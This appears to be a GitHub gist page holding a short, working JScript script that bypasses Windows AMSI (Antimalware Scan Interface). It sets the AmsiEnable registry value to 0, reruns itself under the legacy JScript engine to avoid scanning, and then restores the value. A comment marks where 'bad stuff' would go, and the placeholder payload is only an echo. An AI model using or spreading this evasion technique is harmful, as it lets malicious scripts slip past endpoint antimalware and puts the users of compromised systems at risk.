AMSIEnable Bypass in JScript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var sh = new ActiveXObject('WScript.Shell'); | |
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable"; | |
try{ | |
var AmsiEnable = sh.RegRead(key); | |
if(AmsiEnable!=0){ | |
throw new Error(1, ''); | |
} | |
}catch(e){ | |
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI | |
sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} "+WScript.ScriptFullName,0,1); // blocking call to Run() | |
sh.RegWrite(key, 1, "REG_DWORD"); // put it back | |
WScript.Quit(1); | |
} | |
// do bad stuff below | |
sh.Run("cmd.exe /k echo AMSI bypassed :)") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment